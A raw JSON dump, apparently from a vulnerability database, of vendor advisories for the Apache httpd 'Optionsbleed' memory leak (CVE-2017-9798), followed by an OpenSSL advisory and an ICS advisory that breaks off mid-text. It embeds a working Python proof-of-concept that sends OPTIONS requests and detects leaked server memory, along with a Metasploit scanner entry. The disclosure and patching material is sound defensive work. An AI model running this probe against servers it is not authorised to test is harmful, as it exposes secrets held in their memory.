The httpd24 packages provide a recent stable release of version 2.4 of the Apache HTTP Server, along with the mod_auth_kerb module.\n\nThe following packages have been upgraded to a later upstream version: httpd24-httpd (2.4.27). (BZ#1461819)\n\nSecurity Fix(es):\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. (CVE-2017-9798)\n\nRed Hat would like to thank Hanno B\u00f6ck for reporting this issue.\n\nBug Fix(es):\n\n* The httpd package installation script tried to create both the \"apache\" user and group in a single \"useradd\" command. Consequently, when the \"apache\" group had already been created on the system, the command failed, and the \"apache\" user was not created. To fix this bug, the \"apache\" group is now created by a separate command, and the \"apache\" user is correctly created during httpd installation even when the \"apache\" group exists. (BZ#1486843)\n\n* When installing the httpd24 Software Collection using the \"yum\" command, if the \"apache\" group already existed on the system with GID other than 48, the \"apache\" user was not created. This update fixes the bug. (BZ#1487164)\n\n* With this update, it is possible to run the mod_rewrite external mapping program as a non-root user. (BZ#1486832)\n\n* On a Red Hat Enterprise Linux 6 system, when the httpd service was stopped twice in a row by running the \"service httpd stop\" command, a misleading message was returned: \"Stopping httpd: [FAILED]\". This bug has been fixed. (BZ#1418395)\n\n* When the \"service httpd24-httpd graceful\" command was used on Red Hat Enterprise Linux 7 while the httpd24-httpd service was not running, the daemon was started without being tracked by systemd. 
As a consequence, the daemon ran in an incorrect SELinux domain. This bug has been fixed, and the httpd daemon runs in the correct SELinux domain in the described scenario. (BZ#1440858)\n\nEnhancement(s):\n\n* With this update, the mod_ssl module supports the ALPN protocol on Red Hat Enterprise Linux 7.4 and later versions. (BZ#1327548)\n\nFor further details, see the Red Hat Software Collections 3.0 Release Notes linked from the References section.", "modified": "2018-06-13T01:28:16", "published": "2017-10-24T12:16:35", "id": "RHSA-2017:3018", "href": "https://access.redhat.com/errata/RHSA-2017:3018", "type": "redhat", "title": "(RHSA-2017:3018) Moderate: httpd24 security, bug fix, and enhancement update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-08-13T18:46:29", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. 
(CVE-2017-9798)\n\nRed Hat would like to thank Hanno B\u00f6ck for reporting this issue.", "modified": "2018-04-12T03:32:53", "published": "2017-10-11T19:17:48", "id": "RHSA-2017:2882", "href": "https://access.redhat.com/errata/RHSA-2017:2882", "type": "redhat", "title": "(RHSA-2017:2882) Moderate: httpd security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "\nThe Fuzzing Project reports:\n\nApache httpd allows remote attackers to read secret data from\n\t process memory if the Limit directive can be set in a user's\n\t .htaccess file, or if httpd.conf has certain misconfigurations,\n\t aka Optionsbleed. This affects the Apache HTTP Server through\n\t 2.2.34 and 2.4.x through 2.4.27. The attacker sends an\n\t unauthenticated OPTIONS HTTP request when attempting to read\n\t secret data. This is a use-after-free issue and thus secret data\n\t is not always sent, and the specific data depends on many factors\n\t including configuration. Exploitation with .htaccess can be\n\t blocked with a patch to the ap_limit_section function in\n\t server/core.c.\n\n", "edition": 5, "modified": "2017-09-18T00:00:00", "published": "2017-09-18T00:00:00", "id": "76B085E2-9D33-11E7-9260-000C292EE6B8", "href": "https://vuxml.freebsd.org/freebsd/76b085e2-9d33-11e7-9260-000c292ee6b8.html", "title": "Apache -- HTTP OPTIONS method can leak server memory", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. 
", "modified": "2017-09-22T18:54:37", "published": "2017-09-22T18:54:37", "id": "FEDORA:092E9605F081", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: httpd-2.4.27-3.fc26", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. ", "modified": "2017-09-30T07:40:09", "published": "2017-09-30T07:40:09", "id": "FEDORA:A9847604E850", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: httpd-2.4.27-8.fc27", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "httpd": [{"lastseen": "2020-12-24T14:26:49", "bulletinFamily": "software", "cvelist": ["CVE-2017-9798"], "description": "\nWhen an unrecognized HTTP Method is given in an <Limit {method}>\ndirective in an .htaccess file, and that .htaccess file is processed by the\ncorresponding request, the global methods table is corrupted in the current\nworker process, resulting in erratic behaviour.\nThis behavior may be avoided by listing all unusual HTTP Methods in a global\nhttpd.conf RegisterHttpMethod directive in httpd release 2.4.25 and later.\nTo permit other .htaccess directives while denying the <Limit > directive, see the AllowOverrideList directive.\nSource code patch (2.4) is at;\n\nCVE-2017-9798-patch-2.4.patch\n\nSource code patch (2.2) is at;\n\nCVE-2017-9798-patch-2.2.patch\n\nNote 2.2 is end-of-life, no further release with this fix is planned. 
Users\nare encouraged to migrate to 2.4.28 or later for this and other fixes.\n", "edition": 5, "modified": "2017-09-18T00:00:00", "published": "2017-07-12T00:00:00", "id": "HTTPD:5D6E315A1B98558C0DF8CBE51264FBA5", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: Use-after-free when using <Limit > with an unrecognized method in .htaccess (\"OptionsBleed\")", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-10-05T21:53:57", "bulletinFamily": "software", "cvelist": ["CVE-2017-9798"], "description": "\nWhen an unrecognized HTTP Method is given in an <Limit {method}>\ndirective in an .htaccess file, and that .htaccess file is processed by the\ncorresponding request, the global methods table is corrupted in the current\nworker process, resulting in erratic behaviour.\nThis behavior may be avoided by listing all unusual HTTP Methods in a global\nhttpd.conf RegisterHttpMethod directive in httpd release 2.4.25 and later.\nTo permit other .htaccess directives while denying the <Limit > directive, see the AllowOverrideList directive.\nSource code patch is at;\n\nhttp://www.apache.org/dist/httpd/patches/apply_to_2.4.27/CVE-2017-9798-patch-2.4.patch\n\n", "edition": 1, "modified": "2017-10-05T00:00:00", "published": "2017-07-12T00:00:00", "href": "https://httpd.apache.org/security_report.html", "id": "HTTPD:3647863A8E4AE972669D5EE60974E777", "title": "Apache Httpd < 2.4.28: Use-after-free when using <Limit > with an unrecognized method in .htaccess (\"OptionsBleed\")", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-09-30T11:53:44", "bulletinFamily": "software", "cvelist": ["CVE-2017-9798"], "description": "\nWhen an unrecognized HTTP Method is given in an <Limit {method}>\ndirective in an .htaccess file, and that .htaccess file is processed by the\ncorresponding request, the global methods table is corrupted in 
the current\nworker process, resulting in erratic behaviour.\nThis behavior may be avoided by listing all unusual HTTP Methods in a global\nhttpd.conf RegisterHttpMethod directive in httpd release 2.4.25 and later.\nTo permit other .htaccess directives while denying the <Limit > directive, see the AllowOverrideList directive.\nSource code patch is at;\n\nhttp://www.apache.org/dist/httpd/patches/apply_to_2.4.27/CVE-2017-9798-patch-2.4.patch\n\n", "edition": 2, "modified": "2017-09-18T00:00:00", "published": "2017-07-12T00:00:00", "href": "https://httpd.apache.org/security_report.html", "id": "HTTPD:42FA2547862AB3B3F5E7F776E2D90614", "title": "Apache Httpd < 2.4.28-dev: Use-after-free when using <Limit > with an unrecognized method in .htaccess (\"OptionsBleed\")", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-09-30T11:53:44", "bulletinFamily": "software", "cvelist": ["CVE-2017-9798"], "description": "\nWhen an unrecognized HTTP Method is given in an <Limit {method}>\ndirective in an .htaccess file, and that .htaccess file is processed by the\ncorresponding request, the global methods table is corrupted in the current\nworker process, resulting in erratic behaviour.\nThis behavior may be avoided by listing all unusual HTTP Methods in a global\nhttpd.conf RegisterHttpMethod directive in httpd release 2.2.32 and later.\nTo permit other .htaccess directives while denying the <Limit > directive, see the AllowOverrideList directive.\nSource code patch is at;\n\nhttp://www.apache.org/dist/httpd/patches/apply_to_2.2.34/CVE-2017-9798-patch-2.2.patch\n\nNote 2.2 is end-of-life, no further release with this fix is planned. 
Users\nare encouraged to migrate to 2.4.28 or later for this and other fixes.\n", "edition": 2, "modified": "2017-09-18T00:00:00", "published": "2017-07-12T00:00:00", "href": "https://httpd.apache.org/security_report.html", "id": "HTTPD:FDE6D747713B6B9D98F74AC2CD3A4CA7", "title": "Apache Httpd < 2.2.35-dev: Use-after-free when using <Limit > with an unrecognized method in .htaccess (\"OptionsBleed\")", "type": "httpd", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "amazon": [{"lastseen": "2020-11-10T12:37:35", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "**Issue Overview:**\n\nApache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration.([CVE-2017-9798 __](<https://access.redhat.com/security/cve/CVE-2017-9798>))\n\n \n**Affected Packages:** \n\n\nhttpd24, httpd\n\n \n**Issue Correction:** \nRun _yum update httpd24_ to update your system. \nRun _yum update httpd_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n httpd-tools-2.2.34-1.15.amzn1.i686 \n httpd-devel-2.2.34-1.15.amzn1.i686 \n mod_ssl-2.2.34-1.15.amzn1.i686 \n httpd-2.2.34-1.15.amzn1.i686 \n httpd-debuginfo-2.2.34-1.15.amzn1.i686 \n mod24_proxy_html-2.4.27-3.73.amzn1.i686 \n mod24_session-2.4.27-3.73.amzn1.i686 \n httpd24-devel-2.4.27-3.73.amzn1.i686 \n httpd24-2.4.27-3.73.amzn1.i686 \n httpd24-debuginfo-2.4.27-3.73.amzn1.i686 \n httpd24-tools-2.4.27-3.73.amzn1.i686 \n mod24_ssl-2.4.27-3.73.amzn1.i686 \n mod24_ldap-2.4.27-3.73.amzn1.i686 \n \n noarch: \n httpd-manual-2.2.34-1.15.amzn1.noarch \n httpd24-manual-2.4.27-3.73.amzn1.noarch \n \n src: \n httpd-2.2.34-1.15.amzn1.src \n httpd24-2.4.27-3.73.amzn1.src \n \n x86_64: \n httpd-tools-2.2.34-1.15.amzn1.x86_64 \n httpd-devel-2.2.34-1.15.amzn1.x86_64 \n httpd-2.2.34-1.15.amzn1.x86_64 \n mod_ssl-2.2.34-1.15.amzn1.x86_64 \n httpd-debuginfo-2.2.34-1.15.amzn1.x86_64 \n mod24_ldap-2.4.27-3.73.amzn1.x86_64 \n httpd24-debuginfo-2.4.27-3.73.amzn1.x86_64 \n httpd24-tools-2.4.27-3.73.amzn1.x86_64 \n mod24_proxy_html-2.4.27-3.73.amzn1.x86_64 \n httpd24-devel-2.4.27-3.73.amzn1.x86_64 \n httpd24-2.4.27-3.73.amzn1.x86_64 \n mod24_ssl-2.4.27-3.73.amzn1.x86_64 \n mod24_session-2.4.27-3.73.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2017-09-18T15:32:00", "published": "2017-09-18T15:32:00", "id": "ALAS-2017-896", "href": "https://alas.aws.amazon.com/ALAS-2017-896.html", "title": "Important: httpd24, httpd", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "[2.4.6-67.0.1.el7_4.5]\n- replace index.html with Oracle's index page oracle_index.html\n[2.4.6-67.5]\n- Resolves: #1493064 - CVE-2017-9798 httpd: Use-after-free by limiting\n unregistered HTTP method", "edition": 4, "modified": "2017-10-11T00:00:00", "published": "2017-10-11T00:00:00", "id": "ELSA-2017-2882", "href": 
"http://linux.oracle.com/errata/ELSA-2017-2882.html", "title": "httpd security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "slackware": [{"lastseen": "2020-10-25T16:36:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "New httpd packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\n14.2, and -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/httpd-2.4.27-i586-2_slack14.2.txz: Rebuilt.\n This update patches a security issue (\"Optionsbleed\") with the OPTIONS http\n method which may leak arbitrary pieces of memory to a potential attacker.\n Thanks to Hanno Bo:ck.\n For more information, see:\n http://seclists.org/oss-sec/2017/q3/477\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9798\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/httpd-2.2.34-i486-2_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/httpd-2.2.34-x86_64-2_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/httpd-2.2.34-i486-2_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/httpd-2.2.34-x86_64-2_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/httpd-2.2.34-i486-2_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/httpd-2.2.34-x86_64-2_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/httpd-2.4.27-i486-2_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/httpd-2.4.27-x86_64-2_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/httpd-2.4.27-i486-2_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/httpd-2.4.27-x86_64-2_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/httpd-2.4.27-i586-2_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/httpd-2.4.27-x86_64-2_slack14.2.txz\n\nUpdated package for Slackware 
-current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/httpd-2.4.27-i586-3.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/httpd-2.4.27-x86_64-3.txz\n\n\nMD5 signatures:\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg httpd-2.4.27-i586-2_slack14.2.txz\n\nThen, restart Apache httpd:\n\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "modified": "2017-09-18T19:20:15", "published": "2017-09-18T19:20:15", "id": "SSA-2017-261-01", "href": 
"http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.551634", "type": "slackware", "title": "[slackware-security] httpd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-08-12T01:06:11", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3980-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 20, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : apache2\nCVE ID : CVE-2017-9798\nDebian Bug : 876109\n\nHanno Boeck discovered that incorrect parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 2.4.10-10+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 2.4.25-3+deb9u3.\n\nWe recommend that you upgrade your apache2 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 14, "modified": "2017-09-20T09:20:44", "published": "2017-09-20T09:20:44", "id": "DEBIAN:DSA-3980-1:C7ED3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00242.html", "title": "[SECURITY] [DSA 3980-1] apache2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-30T02:21:35", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "Package : apache2\nVersion : 2.2.22-13+deb7u12\nCVE ID : CVE-2017-9798\nDebian Bug : 876109\n\nHanno Boeck discovered that incorrect 
parsing of Limit directives of\n.htaccess files by the Apache HTTP Server could result in memory\ndisclosure.\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n2.2.22-13+deb7u12.\n\nWe recommend that you upgrade your apache2 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-09-21T20:42:38", "published": "2017-09-21T20:42:38", "id": "DEBIAN:DLA-1102-1:7F277", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00019.html", "title": "[SECURITY] [DLA 1102-1] apache2 security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ubuntu": [{"lastseen": "2020-07-02T11:44:04", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "USN-3425-1 fixed a vulnerability in Apache HTTP Server. This update \nprovides the corresponding update for Ubuntu 12.04 ESM.\n\nOriginal advisory details:\n\nHanno B\u00f6ck discovered that the Apache HTTP Server incorrectly handled \nLimit directives in .htaccess files. In certain configurations, a remote \nattacker could possibly use this issue to read arbitrary server memory, \nincluding sensitive information. This issue is known as Optionsbleed.", "edition": 6, "modified": "2017-10-24T00:00:00", "published": "2017-10-24T00:00:00", "id": "USN-3425-2", "href": "https://ubuntu.com/security/notices/USN-3425-2", "title": "Apache HTTP Server vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-07-02T11:44:14", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "Hanno B\u00f6ck discovered that the Apache HTTP Server incorrectly handled \nLimit directives in .htaccess files. 
In certain configurations, a remote \nattacker could possibly use this issue to read arbitrary server memory, \nincluding sensitive information. This issue is known as Optionsbleed.", "edition": 5, "modified": "2017-09-19T00:00:00", "published": "2017-09-19T00:00:00", "id": "USN-3425-1", "href": "https://ubuntu.com/security/notices/USN-3425-1", "title": "Apache HTTP Server vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:42", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "Arch Linux Security Advisory ASA-201709-15\n==========================================\n\nSeverity: High\nDate : 2017-09-18\nCVE-ID : CVE-2017-9798\nPackage : apache\nType : information disclosure\nRemote : Yes\nLink : https://security.archlinux.org/AVG-404\n\nSummary\n=======\n\nThe package apache before version 2.4.27-2 is vulnerable to information\ndisclosure.\n\nResolution\n==========\n\nUpgrade to 2.4.27-2.\n\n# pacman -Syu \"apache>=2.4.27-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nAn use after free vulnerability has been discovered in Apache HTTP\n2.4.27 that causes a corrupted Allow header to be constructed in\nresponse to HTTP OPTIONS requests. This can leak pieces of arbitrary\nmemory from the server process that may contain secrets. 
The memory\npieces change after multiple requests, so for a vulnerable host an\narbitrary number of memory chunks can be leaked.\nThe bug appears if a webmaster tries to use the \"Limit\" directive with\nan invalid HTTP method.\n\nImpact\n======\n\nA remote attacker is able to leak memory and potentially obtain\nsensitive information from the server process.\n\nReferences\n==========\n\nhttps://bz.apache.org/bugzilla/show_bug.cgi?id=61207\nhttps://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/server/core.c?r1=1805223&r2=1807754&pathrev=1807754&view=patch\nhttp://www.openwall.com/lists/oss-security/2017/09/18/2\nhttps://github.com/hannob/optionsbleed\nhttps://security.archlinux.org/CVE-2017-9798", "modified": "2017-09-18T00:00:00", "published": "2017-09-18T00:00:00", "id": "ASA-201709-15", "href": "https://security.archlinux.org/ASA-201709-15", "type": "archlinux", "title": "[ASA-201709-15] apache: information disclosure", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "centos": [{"lastseen": "2020-12-08T03:34:32", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9798"], "description": "**CentOS Errata and Security Advisory** CESA-2017:2882\n\n\nThe httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.\n\nSecurity Fix(es):\n\n* A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. A remote attacker could possibly use this flaw to disclose portions of the server memory, or cause httpd child process to crash. 
(CVE-2017-9798)\n\nRed Hat would like to thank Hanno B\u00f6ck for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-October/034603.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-tools\nmod_ldap\nmod_proxy_html\nmod_session\nmod_ssl\n\n**Upstream details at:**\n", "edition": 4, "modified": "2017-10-11T20:46:20", "published": "2017-10-11T20:46:20", "href": "http://lists.centos.org/pipermail/centos-announce/2017-October/034603.html", "id": "CESA-2017:2882", "title": "httpd, mod_ldap, mod_proxy_html, mod_session, mod_ssl security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-04-01T18:37:30", "description": "Exploit for linux platform in category web applications", "edition": 1, "published": "2017-09-18T00:00:00", "title": "Apache - HTTP OPTIONS Memory Leak Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9798"], "modified": "2017-09-18T00:00:00", "href": "https://0day.today/exploit/description/28573", "id": "1337DAY-ID-28573", "sourceData": "#!/usr/bin/env python3\r\n \r\n# Optionsbleed proof of concept test\r\n# by Hanno B\u00f6ck\r\n \r\nimport argparse\r\nimport urllib3\r\nimport re\r\n \r\n \r\ndef test_bleed(url, args):\r\n r = pool.request('OPTIONS', url)\r\n try:\r\n allow = str(r.headers[\"Allow\"])\r\n except KeyError:\r\n return False\r\n if allow in dup:\r\n return\r\n dup.append(allow)\r\n if allow == \"\":\r\n print(\"[empty] %s\" % (url))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$\", allow):\r\n z = [x.strip() for x in allow.split(',')]\r\n if len(z) > len(set(z)):\r\n print(\"[duplicates] %s: %s\" % (url, repr(allow)))\r\n elif args.all:\r\n print(\"[ok] %s: %s\" % (url, repr(allow)))\r\n elif re.match(\"^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? 
*)+$\", allow):\r\n print(\"[spaces] %s: %s\" % (url, repr(allow)))\r\n else:\r\n print(\"[bleed] %s: %s\" % (url, repr(allow)))\r\n return True\r\n \r\n \r\nparser = argparse.ArgumentParser(\r\n description='Check for the Optionsbleed vulnerability (CVE-2017-9798).',\r\n epilog=\"Tests server for Optionsbleed bug and other bugs in the allow header.\\n\\n\"\r\n \"Autmatically checks http://, https://, http://www. and https://www. -\\n\"\r\n \"except if you pass -u/--url (which means by default we check 40 times.)\\n\\n\"\r\n \"Explanation of results:\\n\"\r\n \"[bleed] corrupted header found, vulnerable\\n\"\r\n \"[empty] empty allow header, does not make sense\\n\"\r\n \"[spaces] space-separated method list (should be comma-separated)\\n\"\r\n \"[duplicates] duplicates in list (may be apache bug 61207)\\n\"\r\n \"[ok] normal list found (only shown with -a/--all)\\n\",\r\n formatter_class=argparse.RawTextHelpFormatter)\r\nparser.add_argument('hosttocheck', action='store',\r\n help='The hostname you want to test against')\r\nparser.add_argument('-n', nargs=1, type=int, default=[10],\r\n help='number of tests (default 10)')\r\nparser.add_argument(\"-a\", \"--all\", action=\"store_true\",\r\n help=\"show headers from hosts without problems\")\r\nparser.add_argument(\"-u\", \"--url\", action='store_true',\r\n help=\"pass URL instead of hostname\")\r\nargs = parser.parse_args()\r\nhowoften = int(args.n[0])\r\n \r\ndup = []\r\n \r\n# Note: This disables warnings about the lack of certificate verification.\r\n# Usually this is a bad idea, but for this tool we want to find vulnerabilities\r\n# even if they are shipped with invalid certificates.\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n \r\npool = urllib3.PoolManager(10, cert_reqs='CERT_NONE')\r\n \r\nif args.url:\r\n test_bleed(args.hosttocheck, args)\r\nelse:\r\n for prefix in ['http://', 'http://www.', 'https://', 'https://www.']:\r\n for i in range(howoften):\r\n try:\r\n if 
test_bleed(prefix+args.hosttocheck, args) is False:\r\n break\r\n except Exception as e:\r\n pass\n\n# 0day.today [2018-04-01] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/28573"}], "metasploit": [{"lastseen": "2020-10-15T10:21:26", "description": "This module scans for the Apache optionsbleed vulnerability where the Allow response header returned from an OPTIONS request may bleed memory if the server has a .htaccess file with an invalid Limit method defined.\n", "published": "2017-09-27T02:09:07", "type": "metasploit", "title": "Apache Optionsbleed Scanner", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-9798"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED", "href": "", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/apache_optionsbleed.rb"}], "openssl": [{"lastseen": "2020-09-14T11:36:05", "bulletinFamily": "software", "cvelist": ["CVE-2017-3737"], "description": " OpenSSL 1.0.2 (starting from version 1.0.2b) introduced an \"error state\" mechanism. The intent was that if a fatal error occurred during a handshake then OpenSSL would move into the error state and would immediately fail if you attempted to continue the handshake. This works as designed for the explicit handshake functions (SSL_do_handshake(), SSL_accept() and SSL_connect()), however due to a bug it does not work correctly if SSL_read() or SSL_write() is called directly. In that scenario, if the handshake fails then a fatal error will be returned in the initial function call. If SSL_read()/SSL_write() is subsequently called by the application for the same SSL object then it will succeed and the data is passed without being decrypted/encrypted directly from the SSL/TLS record layer. 
In order to exploit this issue an application bug would have to be present that resulted in a call to SSL_read()/SSL_write() being issued after having already received a fatal error. Reported by David Benjamin (Google). \n\n * Fixed in OpenSSL 1.0.2n [(git commit)](<https://github.com/openssl/openssl/commit/898fb884b706aaeb283de4812340bb0bde8476dc>) (Affected 1.0.2b-1.0.2m)\n", "edition": 1, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "OPENSSL:CVE-2017-3737", "href": "https://www.openssl.org/news/secadv/20171207.txt", "title": "Vulnerability in OpenSSL - Read/write after SSL object in error state ", "type": "openssl", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "ics": [{"lastseen": "2020-12-18T03:21:59", "bulletinFamily": "info", "cvelist": ["CVE-2017-3737"], "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 5.9**\n\n * **ATTENTION**: Exploitable remotely\n * **Vendor**: Siemens\n * **Equipment**: Industrial Products\n * **Vulnerability**: Cleartext Transmission of Sensitive Information\n\n## 2\\. UPDATE INFORMATION\n\nThis updated advisory is a follow-up to the updated advisory titled ICSA-18-226-02 Siemens OpenSSL Vulnerability in Industrial 